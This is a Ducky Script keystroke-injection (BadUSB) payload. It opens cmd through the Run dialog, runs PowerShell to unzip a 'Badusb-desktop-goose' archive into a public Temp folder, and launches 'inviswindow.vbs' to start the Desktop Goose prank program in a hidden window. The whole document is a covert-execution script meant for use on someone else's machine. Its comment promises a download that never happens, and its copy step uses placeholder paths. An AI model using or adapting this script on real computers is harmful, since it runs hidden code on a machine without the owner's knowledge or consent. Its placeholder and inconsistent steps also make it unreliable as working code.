REM Download goose and unzip
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING powershell Copy-Item -Path "C:\SourceFolder" -Destination "C:\DestinationFolder" -Recurse
DELAY 500
ENTER
DELAY 1000
STRING powershell Expand-Archive -Path 'C:\Users\Public\Badusb-desktop-goose.zip' -DestinationPath 'C:\Users\Public\Temp'
DELAY 500
ENTER
DELAY 500
STRING cd C:\Users\Public\Temp\Badusb-desktop-goose-main
DELAY 500
ENTER
STRING cscript inviswindow.vbs
DELAY 500
ENTER
STRING exit
DELAY 100
ENTER